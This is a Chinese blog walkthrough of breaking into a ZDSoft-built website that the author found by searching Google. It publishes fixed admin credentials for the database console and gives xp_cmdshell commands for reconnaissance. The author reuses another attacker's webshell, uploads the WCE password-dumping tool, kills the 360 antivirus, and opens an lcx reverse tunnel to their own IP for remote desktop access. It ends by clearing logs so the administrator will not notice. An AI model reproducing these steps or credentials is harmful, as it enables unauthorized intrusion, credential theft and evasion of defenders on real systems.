漏洞分析
http://www.zdsoft.net/admin/left.aspx后台页面,由于zdsoft网站后台可以直接操作数据库的后台http://www.zdsoft.net/Admin/sqlPlatform/operateSql.aspx
而且在访问这个数据库操作页面存在绕过漏洞及登录数据操作页面的用户名和密码是固定的用户名:sbwSqlAdmin 密码:sbwPass@word1
入侵过程
入侵过程
下面是从google中找到的一个网站
Select user
判断数据库为mssql数据库
结果返回dbo说明是mssql数据库
判断是否为管理员
selectis_srvrolemember(‘sysadmin’)
返回值为1,说明为系统管理员权限
查看是否存在存储过程
select* from master.dbo.sysobjects where name=’xp_cmdshell’
存在mssql xp_cmdshell
查看系统开启的端口
execmaster.dbo.xp_cmdshell “netstat -nao”
看到主机开放了3389端口,看看主机是否有外网地址,如果有外网地址,就可以直接是否能直接连上
查看主机ip地址
execmaster..xp_cmdshell ‘ipconfig’
ip地址为10.12.11.9,服务器在内网。我们可以利用lcx进行方向连接
查找sql去查找网站的物理路径
仔细一看以有人在我之前经上传了webhsell,那我们就直接用别人的shell好了。
才看一下cc.aspx密码
execmaster..xp_cmdshell ‘type d:\ZDSoft\sbw\unit\WebApp\cc.aspx’
看了一下内容为一句话后门,密码为pass!用菜刀连之
下一步思路就是写入一句话,将windows下密码破解神器wce及端口转发攻击上传
我们开始上传神器wce
显示上传成功,但是在目录下去无法找到
经过多次上传,发现明明上传成功,但是却在目录下无法找到。于是怀疑是否被杀毒软件拐跑。
查看一下无服务进程 tasklist
果然发现360的杀毒软件。由于我们的权限比较高(system),我们可以有两种方法去绕过。第一将杀毒软件干掉。第二对lcx进行加壳做免杀。
在这我采取了第一种
tasklist/F /IM 360tray.exe
再次上传,ok
执行wce -w破解密码
成功获取密码
我们开始上传lcx
在服务器上运行lcx.exe -slave 我的ip地址 51 127.0.0.1 3389
在本地运行lcx -listen 51 3389
然后可以用远程桌面连接
在连接时发现老是连接不上,出现上面的问题。以为是lcx的问题,换了好几个lcx试了一下发现还是老问题。于是在网上查了一下
发现需要连接127.0.0.2
使用前面得到的用户名密码进行登录,登录成功!
发现被清除的wce程序。清掉防护日志,以免本管理员发现。这个教程就做的这里!希望能得到
转载请注明:jinglingshu的博客 » 渗透zdsoft站点+突破360
